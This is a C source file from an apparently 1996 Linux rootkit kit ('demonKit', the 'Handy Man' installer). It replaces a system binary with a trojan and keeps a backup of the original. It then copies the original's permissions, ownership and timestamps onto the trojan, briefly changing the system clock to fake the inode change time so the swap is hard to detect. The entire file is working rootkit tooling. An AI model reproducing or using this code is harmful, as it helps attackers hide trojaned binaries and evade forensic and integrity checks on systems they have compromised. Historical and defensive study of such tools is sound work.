/*
 	The Handy Man
	
	Install yur programs nicely and cleanly, preserving original
	names, permissions, and timestamps.
	This tool is part of the demonKit for Linux.  Meant to used
	in the Makefile.
	Originally by Cybernetik for linux rootkit, modified by
	daemon9 1996, the Guild Corporation...

	(No longer uses system() call, no longer tries to patch
	binaries to match sum...I never saw it work right, and won't
	work against MD5 checksums...)
*/


#include <stdio.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/time.h>
#include <stdio.h>
#include <unistd.h>

#define BUFSIZE	8192

int main (argc,argv)
int	argc;
char	*argv[];
{
	struct 	stat statbuf;
	struct	timeval ftime[2],otime,ntime;
	struct	timezone tzp;

	char	transistoryBuffer[BUFSIZE];
	int 	n,fd,fd2,fd3;

	if(argc<4){
		fprintf(stderr,"Usage: %s 0riginal backup tr0jan\n",argv[0]);
		exit(0);
	}

	stat(argv[1],&statbuf);			/* Get stat before we start mucking with things */

	fd=open(argv[1],O_RDONLY);		/* Original prog */
	fd2=open(argv[2],O_CREAT|O_RDWR); 	/* Backup */
	fd3=open(argv[3],O_RDONLY);		/* tr0jan */
						/* Backup original program... */
	while(n=read(fd,transistoryBuffer,sizeof(transistoryBuffer)))write(fd2,transistoryBuffer,n);
						/* Install tr0jan program... */
	close(fd);
	fd=open(argv[1],O_TRUNC|O_WRONLY);	/* Original prog (now gonna be tr0jan) */

	while(n=read(fd3,transistoryBuffer,sizeof(transistoryBuffer)))write(fd,transistoryBuffer,n);
						/* I know permissions are fucked on the backups... */

						/* This stuff from fix.c */
	chmod(argv[1],statbuf.st_mode);		/* File permissions */
	chown(argv[1],statbuf.st_uid,statbuf.st_gid);	/* Ownership */
	ftime[0].tv_sec=statbuf.st_atime;	/* Access time */	
	ftime[1].tv_sec=statbuf.st_mtime;	/* Modification time */
	ntime.tv_sec=statbuf.st_ctime;		/* File status change time */
	ftime[0].tv_usec=ftime[1].tv_usec=ntime.tv_usec=0; 
	gettimeofday(&otime,&tzp);		/* Save TOD */
	settimeofday(&ntime,&tzp);		/* Set TOD to last inode access */ 
	utimes(argv[1],ftime);		 	/* Change inode access/mod time */
	settimeofday(&otime,&tzp);		/* Restore TOD */

	fprintf(stderr,"Hi, I'm the handyman and file %s is all fixed up.\n",argv[1]);
	return 0;	
}

